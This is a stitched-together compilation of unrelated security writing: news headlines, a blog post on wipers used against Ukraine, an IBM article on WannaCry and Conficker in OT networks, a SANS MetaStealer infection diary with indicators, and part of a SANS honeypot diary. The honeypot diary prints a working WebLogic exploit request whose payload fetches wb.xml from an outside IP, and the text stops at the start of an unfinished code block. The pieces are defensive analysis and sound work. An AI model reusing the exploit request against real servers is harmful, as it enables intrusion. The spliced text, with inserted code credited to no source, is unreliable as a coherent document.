Experts discover a Chinese-APT cyber espionage operation targeting US organizations (VentureBeat)

Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation (Cybereason Nocturnus) 

Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques (Cybereason) 

Chinese hackers cast wide net for trade secrets in US, Europe and Asia, researchers say (CNN) 

Researchers tie ransomware families to North Korean cyber-army (The Record by Recorded Future)

The Hermit Kingdom’s Ransomware Play (Trellix)

New espionage group is targeting corporate M&A (TechCrunch) 

Cyberespionage Group Targeting M&A, Corporate Transactions Personnel (SecurityWeek) 

UNC3524: Eye Spy on Your Email (Mandiant) 

Yokogawa CENTUM and ProSafe-RS (CISA) 

Cops ignored call to nearby robbery, preferring to hunt Pokémon (Graham Cluley)

Executive summary

2022 has seen an increase in the number of wiper variants targeting Ukrainian entities.
This blog post explains how wipers work and what makes them so effective, and provides a short overview of the most recent samples that have appeared in the Eastern European geopolitical conflict.

How does wiper malware work?

A wiper’s main objective is to destroy data on any storage device and make the information unavailable (T1485). There are two ways of removing files: logical and physical.

Logical file removal is the most common way of erasing a file, performed by users daily when a file is sent to (and emptied from) the Recycle Bin, or when it is removed from the command line or terminal with the del/rm commands. This action deletes the pointer to the file but not the file data, leaving it recoverable with forensic tools as long as the Operating System does not write another file to the same physical location.

However, malware wipers aim to make the data irrecoverable, so they tend to remove the data from the physical level of the disk. The most effective way to remove the data/file is by overwriting the specific physical location with other data (usually a repeated byte like 0xFF). This process usually involves writing to disk several Gigabytes (or Terabytes) of data and can be time consuming. For this reason, in addition to destroying the data, many wipers first destroy two special files in the system:

The Master Boot Record (MBR), which is used during the boot process to identify where the Operating System is stored on the disk. By replacing the MBR, the boot process crashes, making the files inaccessible unless forensic methodologies are used.
The Master File Table (MFT), which is exclusive to NTFS file systems, contains the physical location of files on the drive as well as their logical and physical size and any associated metadata. If big files need to be stored on the drive and cannot use consecutive blocks, they have to be fragmented on the disk, and the MFT holds the information about where each fragment is stored. Removing the MFT means forensic tools are required to recover small files, and it basically prevents recovery of fragmented files, since the link between fragments is lost.

The main difference between wipers and ransomware is that it’s impossible to retrieve the impacted information after a wiper attack. Attackers using wipers do not usually target financial reward but intend to disrupt the victim’s operations as much as possible. Ransomware operators aim to get a payment in exchange for the key to decrypt the user’s data.

With both wiper and ransomware attacks, the victim depends on their back up system to recover after an attack. However, even some wiper attacks carry ransom notes requesting a payment to recover the data. It is important that the victim properly identifies the attack they’ve suffered, or they may pay the ransom without any chance of retrieving the lost data.

In the last month and a half, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks (T1499) to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time. Some of the wipers observed in this timeframe have been: WhisperKill, HermeticWiper, IsaacWiper, CaddyWiper, DoubleZero Wiper and AcidRain.

Most recent wiper examples

WhisperKill

On January 14, 2022, the Ukrainian government experienced a coordinated attack on 22 of its government agencies, defacing their websites. Almost all the compromised websites were developed by the same Ukrainian IT company, Kitsoft, and all of them were built on OctoberCMS. Therefore, the attack vector was most probably a supply chain attack on the IT provider, or an exploitation of an OctoberCMS vulnerability, combined with exploitation of the Log4Shell vulnerability (T1190).

Figure 1. Example of defaced Ukrainian government website.

In addition to the website defacement, the Microsoft Threat Intelligence Center (MSTIC) reported destructive malware targeting Ukrainian organizations, consisting of two samples. Microsoft named the malware WhisperGate, while other security companies labeled the downloader WhisperGate and the actual wiper WhisperKill, which was considered a component of WhisperGate.

The identified files were:

Stage 1 replaces the Master Boot Record (MBR) with a ransom note when the system is powered down, rendering the machine unbootable from that point on. When booted up, the system displays the note shown in Figure 2. Despite the ransom request, the data will not be recoverable, since all of WhisperKill’s efforts aim to destroy data, not encrypt it. In this case, the wallet is most probably an attempt to mislead attribution efforts.

Figure 2. Ransom note obtained by MSTIC.

Stage 2 attempts to download the next-stage malware (T1102.003) from the Discord app; if unsuccessful, it sleeps and tries again. The payload downloaded from the messaging app destroys as much data as possible by overwriting certain file types with 0xCC for the first MB of each file, then changes the file extension to a random four-byte extension. By selecting the file types to be wiped and only overwriting the first MB of data, the attackers optimize the wiping process: no time is wasted on system files, and only the time needed to make each file unrecoverable is spent before rapidly moving on to the next one. Finally, the malware executes a command to delete itself from the system (T1070.004).
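As an added example (not code from the report), the following Python performs two offline triage checks for artifacts described in the “How does wiper malware work?” section and in the WhisperKill stage 2 description above: whether a 512-byte sector zero still carries its boot signature and a partition entry, and whether a file’s first MB has been filled with a single byte such as 0xCC, noting that anything past that first MB survives. All sample data is constructed inline, and “MB” is taken as 1 MiB (an assumption).

```python
"""Offline triage checks for MBR replacement and first-MB overwrite wiping.

mbr_looks_intact() checks that a 512-byte sector zero still has the 0x55AA
boot signature and at least one non-empty partition entry, structures that a
wiper replacing the MBR destroys. overwritten_prefix() reports whether the
first MB of a file is one repeated byte (WhisperKill stage 2 writes 0xCC over
the first MB), and triage_file() notes whether data past that MB survived.
All sample data below is constructed; "MB" is taken as 1 MiB (assumption).
"""
from typing import Dict, Optional

ONE_MB = 1024 * 1024
BOOT_SIGNATURE = b"\x55\xAA"
PARTITION_TABLE_OFFSET = 0x1BE  # four 16-byte entries precede the signature


def mbr_looks_intact(sector: bytes) -> bool:
    """True if the sector has a boot signature and a non-empty partition table."""
    if len(sector) != 512 or sector[510:512] != BOOT_SIGNATURE:
        return False
    entries = [sector[PARTITION_TABLE_OFFSET + 16 * i:
                      PARTITION_TABLE_OFFSET + 16 * (i + 1)] for i in range(4)]
    return any(entry != bytes(16) for entry in entries)


def overwritten_prefix(data: bytes, window: int = ONE_MB) -> Optional[int]:
    """Return the fill byte if the first `window` bytes (or the whole file,
    if it is shorter) are a single repeated value; None otherwise."""
    head = data[:window]
    if not head:
        return None
    return head[0] if head.count(head[0]) == len(head) else None


def triage_file(name: str, data: bytes) -> Dict[str, object]:
    """Summarize a file: fill byte of its first MB and whether a tail survives."""
    fill = overwritten_prefix(data)
    tail = data[ONE_MB:]
    return {
        "name": name,
        "fill_byte": None if fill is None else f"0x{fill:02X}",
        # only the first MB is overwritten, so larger files keep their tail
        "tail_survives": (fill is not None and len(tail) > 0
                          and overwritten_prefix(tail) != fill),
    }


def constructed_mbr() -> bytes:
    """Constructed sector zero: empty boot code, one partition entry, signature."""
    entry = (bytes([0x80, 0x00, 0x02, 0x00, 0x07, 0xFE, 0xFF, 0xFF])
             + (2048).to_bytes(4, "little") + (204800).to_bytes(4, "little"))
    return bytes(446) + entry + bytes(48) + BOOT_SIGNATURE


if __name__ == "__main__":
    print(mbr_looks_intact(constructed_mbr()))    # True
    print(mbr_looks_intact(b"\xCC" * 512))         # False: signature gone
    # constructed victim file: first MB filled with 0xCC, renamed extension
    wiped = b"\xCC" * ONE_MB + b"surviving tail of a larger document"
    print(triage_file("report.xlsx.Kq2p", wiped))
```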

HermeticWiper

A month later, on February 23rd, 2022, ESET Research reported a new wiper being used against hundreds of Ukrainian systems. The wiper takes its name from the stolen code-signing certificate (T1588.003) issued to “Hermetica Digital Ltd” that it used to bypass security controls. According to a Reuters article, the certificate could also have been obtained by impersonating the company and requesting a certificate from scratch.

Figure 3. Hermetica Digital Ltd certificate.

The attackers have been seen using several methods to distribute the wiper across the domain: domain Group Policy Objects (GPO) (T1484.001), Impacket or SMB (T1021.002), and WMI (T1047), together with an additional worm component named HermeticWizard.

The wiper component first installs the payload as a service (T1569.002) under C:\Windows\system32\Drivers. Afterwards, the service corrupts the first 512 bytes of the MBR of all physical drives and then enumerates their partitions. Before attempting to overwrite as much data as it can, it deletes key files in each partition, such as the MFT, $Bitmap, $LogFile, the NTUSER registry hive (T1112) and the event logs (T1070.001).

On top of deleting key file system structures, it also fragments the drive (breaking files up and spreading their parts across the drive). The combination of file fragmentation and deletion of the MFT makes file recovery difficult, since files are scattered across the drive in small parts – without any guidance as to where each part is located.

Finally, the malware writes randomized contents into all occupied sectors in the partition in an attempt to remove all potential hope of recovering any data with forensic tools or procedures.

IsaacWiper

A day after the initial destructive attack with HermeticWiper, on February 24th, 2022, a new wiper was used against the Ukrainian government, as reported by ESET, without any significant similarities to the HermeticWiper used the day before.

IsaacWiper identifies all physical drives not containing the Operating System and locks their logical partitions so that only a single thread can access each of them. Then it starts writing random data to the drives in 64 KB chunks. There is a single thread per volume, which makes the wiping process very long.

Once the other physical drives and the logical partitions sharing a physical drive with the Operating System’s volume have been wiped, this last volume is wiped by:

Erasing the MBR.
Overwriting all files with 64 KB chunks of random data with one thread.
Creating a new file under the C drive, which is filled with random data until it takes up as much space as it can on the partition, overwriting the already overwritten existing files. This is performed by a different thread, but it still takes a long time to write the full partition, since both concurrent threads are attempting to write random data across the whole disk.

Figure 4. IsaacWiper strings.

When comparing IsaacWiper to WhisperKill, the attackers’ priorities become clear. WhisperKill’s creators prioritized speed and the number of affected files over ensuring the full drive is overwritten, since only 1 MB of each file was overwritten. On the other hand, IsaacWiper’s creators gave total priority to delivering the most effective wiper, no matter how long it takes to overwrite the full physical disk.

AcidRain

On the same day IsaacWiper was deployed, another wiper attacked Viasat KA-SAT modems in Ukraine; SentinelLABS named it AcidRain. This wiper was specifically aimed at modems, probably to disrupt Internet access from Ukraine. It showed similarities to VPNFilter, a botnet previously seen targeting modems and routers. VPNFilter was used in 2018, exploiting vulnerabilities in several common router brands: Linksys, MikroTik, NETGEAR, and TP-Link. Exploiting those vulnerabilities gave the attackers initial access to all types of networks, where the bot would search for Modbus traffic to identify infected systems connected to Industrial Control Systems (ICS).

The wiper used was an ELF MIPS binary targeting Viasat KA-SAT modems, which first overwrites any file outside the directories of a common *nix installation (bin, boot, dev, lib, proc, sbin, sys, usr, etc.) and then destroys data under /dev/.

CaddyWiper

The first version of CaddyWiper was discovered by ESET researchers on 2022-03-14, when it was used against a Ukrainian bank. This new wiper variant does not have any significant code similarities to previous wipers. This sample specifically sets an exclusion to avoid wiping Domain Controllers in the infected environment. Afterwards, it targets C:/Users and any additional attached drive up to letter Z:/ and zeroes all files present in those folders/drives. Finally, the extended information of the physical drives is destroyed, including the MBR and partition entries.

A variant of CaddyWiper was used again on 2022-04-08 14:58 against high-voltage electrical substations in Ukraine. This latest version of the wiper was delivered together with Industroyer2, an evolution of Industroyer, whose main function is to communicate with industrial equipment. In this case, the wiper was used to slow down recovery from the Industroyer2 attack and the regaining of control over the ICS consoles, as well as to cover the tracks of the attack. According to WeLiveSecurity, who have been cooperating with CERT-UA in this investigation, the Sandworm Team is behind this latest attack.

In this same attack against the energy station in Ukraine, other wiper samples for Linux and Solaris were observed by WeliveSecurity. These wipers leverage the shred command if present, otherwise they use the basic dd or rm commands to wipe the system.

DoubleZero wiper

On March 22, 2022 CERT-UA reported a new wiper used against their infrastructure and enterprises. Named DoubleZero, the wiper was distributed as a ZIP file containing an obfuscated .NET program. The wiper’s routine sets a hardcoded list of system directories, which are skipped during an initial wiping targeting user files. Afterwards, the skipped system directories are targeted and finally the registry hives: HKEY_LOCAL_MACHINE (containing the hives Sam, Security, Software and System), HKEY_CURRENT_USER and HKEY_USERS.

There are two wiping methods, both of which zero out the selected file.

Figure 5. DoubleZero first wiping function.

Conclusion

As we have seen in the examples above, the main objective of the attackers behind wipers is to destroy all possible data and render systems unbootable (if possible), potentially requiring a full system restore if backups aren’t available. These malware attacks can be as disruptive as ransomware attacks, but wipers are arguably worse since there is no potential escape door of a payment to recover the data.

There are plenty of ways to wipe systems. We’ve looked at 6 different wiper samples observed targeting Ukrainian entities. These samples approach the attack in very different ways, and most of them complete faster than the time required to respond. For that reason, it is not effective to rely on detection of wiper malware, as once a wiper is in the system it is already too late. The best approach against wipers is to prevent attacks by keeping systems up to date and by increasing cybersecurity awareness. In addition, the consequences can be ameliorated by having periodic backup copies of key infrastructure available.

Associated indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the following OTX Pulses:

WhisperKill
HermeticWiper and IsaacWiper
AcidRain
CaddyWiper
DoubleZero

Please note, the pulses may include other activities related but out of the scope of the report.

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0001: Initial Access
    T1190: Exploit Public-Facing Application

TA0002: Execution
    T1047: Windows Management Instrumentation
    T1569: System Services
        T1569.002: Service Execution

TA0008: Lateral Movement
    T1021: Remote Services
        T1021.002: SMB/Windows Admin Shares

TA0005: Defense Evasion
    T1070: Indicator Removal on Host
        T1070.004: File Deletion
        T1070.001: Clear Windows Event Logs
    T1112: Modify Registry
    T1484: Domain Policy Modification
        T1484.001: Group Policy Modification

TA0011: Command and Control
    T1102: Web Service
        T1102.003: One-Way Communication

TA0040: Impact
    T1485: Data Destruction
    T1499: Endpoint Denial of Service

TA0042: Resource Development
    T1588: Obtain Capabilities
        T1588.003: Code Signing Certificates

This post was written with contributions from IBM Security’s Sameer Koranne and Elias Andre Carabaguiaz Gonzalez.

Operational technology (OT) — the networks that control industrial control system processes — faces a more complex challenge than its IT counterparts when it comes to updating operating systems and software to avoid known vulnerabilities. In some cases, implementation of a patch could lead to hours or days of costly downtime. In other cases, full mitigation would require net new purchases of potentially millions of dollars’ worth of machinery to replace already functional systems simply because they are timeworn.

It’s no secret OT systems face this conundrum — and it’s become increasingly obvious cyber criminals are aware of this weakness, too. While there’s no shortage of recent headlines decrying the vulnerability of these systems to the more sophisticated malware commonly used by threat actors today, those conversations have overlooked another potential — yet equally serious — threat to OT: older malware still floating in the ether.

This is malware for which most systems have been patched and protected against, immunizing large swaths of networks and effectively dropping the older malware from the radar of IT teams (and headlines). Two examples of this kind of older malware include Conficker and WannaCry.

While occurrences of these malware types plaguing OT environments are relatively rare, they do occur — and often leave organizations combating a threat that was largely forgotten.

WannaCry: The Scourge of 2017… and Beyond

The WannaCry ransomware outbreak was a watershed for cybersecurity professionals in 2017 — a moment in time many in this industry will never forget. The fast-spreading worm that leveraged the EternalBlue exploit ended up affecting more than 200,000 devices in over 150 countries. From X-Force’s perspective, WannaCry is the ransomware type they have most commonly seen at organizations with OT networks since 2018 — and, occasionally, WannaCry will even migrate into the OT portions of the network itself.

One example of WannaCry infecting an OT network is Taiwan Semiconductor Manufacturing Company (TSMC) in 2018. Despite having robust network segmentation and cybersecurity practices in place, human error led to a vendor installing a software update on the OT portion of the network using a machine unknowingly infected with WannaCry ransomware. Because the laptop used for the software installation had been patched and was using an up-to-date operating system, it was not susceptible to the ransomware — but the OT network, on the other hand, was very susceptible.

The WannaCry ransomware spread quickly across TSMC’s network and infected several systems, since the OT network included multiple unpatched Windows 7 systems. The ransomware affected sensitive semiconductor fabrication equipment, automated material handling systems, and human-machine interfaces. It also caused days of downtime estimated to cost the company $170 million. CC Wei, the CEO of the company, said in a statement, “We are surprised and shocked. We have installed tens of thousands of tools before, and this is the first time this happened.” As a result of the incident, the company implemented new automated processes that would be less likely than human error to miss a critical security step.

WannaCry continues to affect organizations with OT networks, although — thankfully — X-Force observes such incidents much less frequently today than they did in 2018 and 2019, as many organizations are able to apply patches or identify workarounds to more effectively insulate networks from WannaCry.

Enter Conficker: Continuing to Emerge in 2021

An old worm — even older than WannaCry — that X-Force has observed on OT networks in 2021, however, is Conficker. This worm emerged in late 2008 as threat actors quickly leveraged newly released vulnerabilities in the Microsoft Windows XP and 2000 operating systems. Conficker seeks to steal and leverage passwords and hijack devices running Windows to run as a botnet. Because the malware is a worm, it spreads automatically, without human intervention, and has continued to spread worldwide for well over a decade.

Conficker — sometimes with different names and variants — is still present in some systems today, including in OT environments. As with WannaCry, the presence of legacy technologies and obsolete operating systems — including Windows XP, Windows Server 2003, and proprietary protocols that are not updated or patched as often as their IT network counterparts — make these environments especially vulnerable to Conficker. In addition, many legacy systems have limited memory and processing power, further constraining administrators’ ability to insulate them from infections such as Conficker or WannaCry, as the system will not even support a simple antivirus software installation.

The Conficker worm is particularly effective against Windows XP machines, especially unpatched versions, which are common in OT environments. The fast-spreading nature of the Conficker worm can be a challenge for network engineers — once infected, every Windows machine connected to the network could be impacted in as little as one hour. Since many OT environments are built on 20- to 30-year-old designs, partially modified to add connectivity for ease of access, they provide the ideal environment for even the simplest malware, Conficker included.

In the Conficker infections X-Force has observed, the worm was able to affect human-machine interfaces (HMIs), whose transmitted network traffic initially alerted security staff to the infection. X-Force malware reverse engineering of the Conficker worm indicates that it exploits the MS08-067 vulnerability to initially infect the host. Fortunately, in some cases Conficker malware — even when present in OT environments — has not led to operational damage or product quality degradation. Of course, this may not be the case for all network architectures on which Conficker malware may appear.

Defending OT Networks from Old Malware: Lessons From the Trenches

Even though many OT environments are running obsolete software and network topographies, there are measures organizations can take to defend against older malware strains such as WannaCry and Conficker. Often, the highest priority in an OT environment is maximizing uptime, leaving little room for maintenance, re-design, updates and their associated downtime. Yet even within these confines, there are many measures organizations can take to decrease the opportunities for old malware to get onto, spread within, and negatively affect their network.

Some of these include:

1. Network segmentation: Micro-segment the networks within an OT environment. If different lines do not need to communicate with each other, there is no need to create and maintain a large network subnet for all systems. Improve reliability of systems by segregating those in smaller subnets and restricting traffic at boundaries. In addition, an industrial demilitarized zone (iDMZ) is your best ally for compartmentalization and network segmentation. Avoid dynamic host configuration protocol (DHCP) as much as possible; should you be required to use it, subnet it to the lowest possible net mask. Configure virtual local area networks (VLANs) if possible.

2. Know what you have: Systems older than 20 years probably do not have a good electronic record in a configuration management database (CMDB) and may be missing or have outdated network drawings. Reverse engineering this information during an incident is not productive, and ensuring assets and network information is maintained accurately can go a long way. Be aware of the IPs, MACs, operating systems, and software licenses in your asset inventory. Get to know your environment up to the revision date of your software. Make clear which users are allowed to log on to machines based on specific roles; if possible, link users to a machine’s serial number.

3. Harden legacy systems to maintain a secure configuration: Remove all unused users and revoke all unnecessary administrative privileges, remove all unused software, disable all unused ports (running a packet capture can help), and prohibit using these assets for personal use. Insecure configuration of endpoints can leave open vulnerabilities for exploitation by adversaries or self-propagating malware. Identify unused and unwanted applications and delete them to reduce the attack surface. Avoid proprietary protocols as much as possible, unless they are constantly updated; check for and use better, newer protocols that are standardized.

4. Continuous Vulnerability Management: A vulnerability management program allows organizations to reduce the likelihood of vulnerability exploitation and unauthorized network access by a malicious actor and is necessary to make informed vulnerability treatment decisions based on risk appetite and regulatory compliance requirements. All necessary security and safety relevant patches must be applied as soon as feasible. If it is not possible to patch the system, ensure other compensating security controls are implemented to reduce the risk. Identify the lowest demand times in a day or week and commit to having downtime and maintenance windows for patching and updating. Routinely check for advisories on ICS-CERT and note whether your vendors are impacted.

5. Reduce SMB Attack Surface: Both WannaCry and Conficker are known to exploit SMB. Server Message Block (SMB) is a network communication protocol used to provide shared access to services on a network, such as file shares and printers. Because of its prevalence in information technology environments, adversaries commonly use this protocol to move laterally within a compromised environment, interact with remote systems, deploy malware, and transfer files. Moreover, SMB can provide a convenient way to bypass Multi-Factor Authentication (MFA) and remotely execute code. To reduce the attack surface and the overall risk associated with SMB-based lateral movement, consider the following hardening measures:

Configure Windows firewall to DENY all inbound SMB communications to workstations. This control will disable inbound connections on TCP ports 139 and 445.
Audit server SMB requirements and explicitly DENY SMB inbound on servers that do not require the protocol as part of their functionality.
Consider disabling legacy versions of the SMB protocol and migrating business applications to SMB v3.1. This activity requires careful planning and risk evaluation due to its potential impact on business operations.

6. Avoid the use of Portable Media: Uncontrolled portable media significantly increase the risk to legacy OT environments, as OT systems may not have the latest security patches to defend against newer attack methodologies. Uncontrolled and unsecured use of portable media can expose an OT network to exploits and to unplanned outages and downtime.

Have a security policy for secure use of portable media in OT environments.
Ideally, strictly prohibit use of USB flash drives. Should there be an absolute necessity of using one, designate a single USB stick for any maintenance and re-format it every time you use it.
Implement processes and technical controls that adequately support the security policy requirements. Controls may include, but are not limited to the following:
Every use of the device is documented in the logbook
The devices are scanned on designated quarantine PCs to ensure a robust AV scan before use on OT endpoints. Ensure that anti-malware software is configured to automatically scan portable media
Control the number of portable media devices approved to be used in the environment
Disable autorun and autoplay auto-execute functionality for removable media.

Consider implementing Secure Media Exchange solutions such as Honeywell SMX or OPSWAT MetaDefender.

7. Rehearse Disaster Recovery (DR) and Incident Response (IR) scenarios regularly: DR plans should be documented, reliable backups should be available, and OT personnel must have an understanding and intimate knowledge of how the system should be recovered. IR and DR exercises should be conducted regularly to build the muscle memory needed for reliable recovery. Educate your team about imminent security threats and make them part of the security process. As part of any plan, have a direct line with your organization’s CSIRT: your best play is always a fast response and a transparent environment, so be organized and report everything.

8. Employ network monitoring solutions: Firewalls, Access Control Lists (ACLs) and Intrusion Prevention Systems (IPS) can assist in keeping a close eye on traffic traversing your network. Check for new nodes or machines communicating with suspicious assets. If you employ an intrusion detection system (IDS), ensure your signatures are up to date. Even when monitoring for old malware, new signatures appear every day.

While it isn’t common for an OT network to be infected with older malware like WannaCry or Conficker, documented cases do indeed exist, and they can leave costly destruction and even safety consequences in their wake.

To learn how X-Force can keep your network safer, download the X-Force for OT solution brief.

Read the 2022 X-Force Threat Intelligence Index Report to understand the latest OT Threats

The post Where Everything Old is New Again: Operational Technology and Ghost of Malware Past appeared first on Security Intelligence.

Introduction

Since Wednesday 2022-03-30, at least 16 samples of a specific Excel file have been submitted to VirusTotal.
These malicious Excel files are distributed as email attachments.
Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity from the EmergingThreats Pro (ETPRO) ruleset.
This infection process uses data binaries to create the malicious EXE and DLL files used for the infection.
The malware abuses legitimate services by Github and transfer.sh to host these data binaries.
All URLs, domains, and IP addresses were still active for the infection approximately 3 hours before I posted this diary.

Shown above:  Flow chart for the MetaStealer infection chain reviewed in today’s diary.

Images from an infection

Shown above:  Screenshot from an email distributing the malicious Excel file.

Shown above:  Screenshot of the malicious Excel file.

Shown above:  Traffic from an infection on Tuesday 2022-04-05 filtered in Wireshark.

Shown above:  Alerts from the infection Security Onion using the Suricata and the ETPRO ruleset.

Shown above:  UAC alert generated by malicious EXE during the infection.

Shown above:  Malicious EXE file generated during the infection.

Shown above:  Malicious EXE persistent on the infected Windows host.

Indicators of Compromise (IOCs)

Traffic generated after enabling Excel macro:

hxxps://github[.]com/michel15P/1/raw/main/notice.zip
hxxps://raw.githubusercontent[.]com/michel15P/1/main/notice.zip
Note: File returned from the above URL is a data binary and not a zip archive

Traffic generated by persistent EXE created from the above binary:

port 80 – transfer[.]sh – GET /get/qT523D/Wlniornez_Dablvtrq.bmp
port 443 – hxxps://transfer[.]sh/get/qT523D/Wlniornez_Dablvtrq.bmp
193.106.191[.]162 port 1775 – 193.106.191[.]162:1775 – GET /avast_update
193.106.191[.]162 port 1775 – 193.106.191[.]162:1775 – GET /api/client/new
193.106.191[.]162 port 1775 – 193.106.191[.]162:1775 – POST /tasks/get_worker

Alerts on traffic to 193.106.191[.]162 over TCP port 1775:

ETPRO MALWARE Win32/MetaStealer Related Activity (GET) sid: 2851362
ETPRO MALWARE Win32/MetaStealer Related Activity (POST) sid: 2851363

Associated malware and artifacts:

SHA256 hash: 981247f5f23421e9ed736dd462801919fea2b60594a6ca0b6400ded463723a5e

File size: 88,069 bytes
File name: transfer_info2460.xls
File description: Example of email attachment, an Excel file with macro for malware
Sandbox analysis: https://app.any.run/tasks/02a6b252-5ea1-4f2b-96d3-4eb2eaec34ca

SHA256 hash: 81e77fb911c38ae18c268178492224fab7855dd6f78728ffedfff6b62d1279dc

File size: 2,828 bytes
File name: open.vbs
File location: same directory as the above Excel file or the user’s AppData/Local/Temp directory
File description: After enabling macro, this VBS file is used to create the persistent EXE
Note: I could not find this file on my infected lab host

SHA256 hash: 8cfa23b5f47ee072d894ee98b1522e3b8acc84a6e9654b71f50536e74a3579a5

File size: 417,512 bytes
File location: hxxps://raw.githubusercontent[.]com/michel15P/1/main/notice.zip
File type: data
File description: data binary retrieved by open.vbs and used to create the persistent EXE (below)

SHA256 hash: f644bef519fc0243633d13f18c97c96d76b95b6f2cbad2a2507fb8177b7e4d1d

File size: 367,001,600 bytes
File location: C:\Users\[username]\AppData\Local\Temp\notice.exe
File location: C:\Users\[username]\AppData\Roaming\qwveqwveqw.exe
File description: Malware EXE persistent on the infected Windows host
Note: This binary is appended with more than 366 MB of zero byte filler
Note: Persistent through “Shell” value at HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

SHA256 hash: 7641ae596b53c5de724101bd6df35c999c9616d93503bce0ffd30b1c0d041e3b

File size: 143,400 bytes
File description: Persistent malware EXE with most of the zero byte filler removed

SHA256 hash: fba945b78715297f922b585445c74a4d7663ea2436b8c32bcb0f4e24324d3b8b

File size: 716,288 bytes
File location: hxxps://transfer[.]sh/get/qT523D/Wlniornez_Dablvtrq.bmp
File type: data
File description: Retrieved by persistent EXE, this binary is a Windows DLL file in reverse byte order

SHA256 hash: bf3b78329eccd049e04e248dd82417ce9a2bcaca021cda858affd04e513abe87

File size: 716,288 bytes
File description: Windows DLL file created by reversing the byte order of the above binary
File type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Run method: loaded/run by persistent EXE

SHA256 hash: cb6254808d1685977499a75ed2c0f18b44d15720c480fb407035f3804016ed89

File size: 2,182,488 bytes
File location: hxxp://193.106.191[.]162:1775/avast_update
File description: base64 text representing a Windows DLL file

SHA256 hash: 71e54b829631b93adc102824a4d3f99c804581ead8058b684df25f1c9039b738

File size: 1,636,864 bytes
File description: Windows DLL file converted from the above text
File type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Run method: unknown, loaded/run by persistent EXE or previous DLL loaded/run by persistent EXE
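The "data" binaries listed above hide a PE in three ways: byte order reversed, base64 text, or hundreds of megabytes of zero filler appended. The helper below is an added example (not code from the diary): it applies the inverse of each disguise to a blob and checks for a valid DOS/PE header; the bytes it runs on are a constructed stand-in for a PE, not the real samples.

```python
import base64
import binascii
import struct


def pe_header_offset(blob):
    """Return the offset of the 'PE\\0\\0' signature if blob parses as a PE
    image, else -1: checks the DOS 'MZ' stub, reads e_lfanew at 0x3C and
    verifies that the NT signature sits at that offset."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return -1
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 4 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return -1
    return e_lfanew


def recover_pe(blob):
    """Undo the disguises seen in this chain (byte reversal, base64 text) and
    return (transformation, pe_bytes) for the first one that yields a valid
    PE header, or None if none does."""
    raw = bytes(blob)
    candidates = [("as-is", raw), ("byte-reversed", raw[::-1])]
    try:
        text = raw.translate(None, b" \r\n\t")            # base64 may be line-wrapped
        candidates.append(("base64-decoded", base64.b64decode(text, validate=True)))
    except (ValueError, binascii.Error):
        pass                                               # not valid base64 text
    for name, data in candidates:
        if pe_header_offset(data) >= 0:
            return name, data
    return None


def trailing_zero_run(blob):
    """Length of the zero-byte run at the end of the file. The persistent EXE
    above carried more than 366 MB of such filler, a trick to exceed scanner
    size limits; compare it to the total size to see how bloated a file is."""
    return len(blob) - len(bytes(blob).rstrip(b"\0"))


def make_fake_pe():
    """Constructed stand-in for a PE file (not an executable): a DOS header
    whose e_lfanew points at a 'PE\\0\\0' signature, followed by dummy bytes."""
    e_lfanew = 0x80
    header = bytearray(b"MZ") + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    header += bytes(e_lfanew - len(header))
    return bytes(header) + b"PE\0\0" + bytes(20) + b"constructed-sample"


def constructed_samples():
    """Each disguise from the IOC list applied to the constructed PE."""
    fake = make_fake_pe()
    return {
        "raw": fake,
        "reversed": fake[::-1],
        "base64": base64.b64encode(fake),
        "padded": fake + bytes(4096),
    }


if __name__ == "__main__":
    for label, blob in constructed_samples().items():
        hit = recover_pe(blob)
        print(f"{label:9s} -> {hit[0] if hit else 'no PE found'}, "
              f"trailing zero filler: {trailing_zero_run(blob)} bytes")
```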

Final words

Each time I rebooted my infected Windows host, the persistent EXE generated traffic to the same transfer.sh URL and re-started the infection process without the Github traffic.

Malware associated with this infection was first submitted to VT on Wednesday 2022-03-30.  ETPRO signatures identifying HTTP traffic generated by this malware as MetaStealer were released on Friday 2022-04-01.

My thanks to Security Onion, Proofpoint’s EmergingThreats team, and Didier Stevens’ tools for reversing binaries. These three resources were a big help in my analysis for this diary.

A pcap of the infection traffic and the associated malware/artifacts can be found here.

—Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


Looking through my honeypot logs for some Spring4Shell exploits (I didn’t find anything interesting), I came across this attempt to exploit an older WebLogic vulnerability (likely CVE-2020-14882 or CVE-2020-14883). The exploit itself is “run of the mill,” but the script it downloads goes through an excessively long list of competitors to disable and also disables cloud monitoring tools, likely to make detection and response more difficult. Many organizations will not notice that they no longer receive any alerts 😉

The initial exploit came from 109.237.96.124 (the IP is in Russia and has been scanning for port 7001 for a couple of weeks now):

POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: [redacted]:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 148
Connection: Keep-Alive

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://185.231.153.4/wb.xml")

It is pretty apparent from the above request that the exploit attempts to download wb.xml from 185.231.153.4 (another Russian IP, which does not appear to be involved in any active scanning):
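The request above has two features a detection can key on: the double percent-encoded `..` that escapes the static /console/images/ path and lands on console.portal, and a `handle` parameter naming a class outside the console's own handle package. The inspector below is an added example (not the diary's code); the attack request is the one shown above with headers trimmed, the benign console request is constructed for comparison, and the assumption that legitimate handles live under `com.bea.console.handles.` should be checked against your own console traffic.

```python
import re
from urllib.parse import parse_qs, unquote

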